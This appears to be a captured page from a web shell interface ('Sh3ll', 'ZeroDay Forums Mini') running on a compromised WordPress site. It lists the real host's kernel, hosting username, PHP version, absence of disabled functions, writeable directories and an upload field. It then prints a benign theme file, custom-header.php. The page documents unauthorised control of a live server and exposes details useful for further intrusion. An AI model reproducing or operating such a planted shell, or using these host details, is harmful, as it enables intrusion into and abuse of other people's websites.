Sh3ll
OdayForums


Server : LiteSpeed
System : Linux premium84.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : claqxcrl ( 523)
PHP Version : 8.1.32
Disable Function : NONE
Directory :  /home/claqxcrl/askdragao.com/wp-content/themes/sirat/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/claqxcrl/askdragao.com/wp-content/themes/sirat/inc/custom-header.php
<?php
/**
 * @package Sirat
 * Setup the WordPress core custom header feature.
 *
 * @uses sirat_header_style()
*/
function sirat_custom_header_setup() {
	add_theme_support( 'custom-header', apply_filters( 'sirat_custom_header_args', array(
		'default-text-color'     => 'fff',
		'header-text' 			 =>	false,
		'width'                  => 1600,
		'height'                 => 148,
		'flex-width'             => true,
		'flex-height'            => true,
		'wp-head-callback'       => 'sirat_header_style',
	) ) );
}
add_action( 'after_setup_theme', 'sirat_custom_header_setup' );

if ( ! function_exists( 'sirat_header_style' ) ) :
/**
 * Styles the header image and text displayed on the blog
 *
 * @see sirat_custom_header_setup().
 */
add_action( 'wp_enqueue_scripts', 'sirat_header_style' );

function sirat_header_style() {
	//Check if user has defined any header image.
	if ( get_header_image() ) :
	$custom_css = "
        .home-page-header{
			background-image:url('".esc_url(get_header_image())."');
			background-position: center top;
			background-size: cover;
		}";
	   	wp_add_inline_style( 'sirat-basic-style', $custom_css );
	endif;
}
endif;

ZeroDay Forums Mini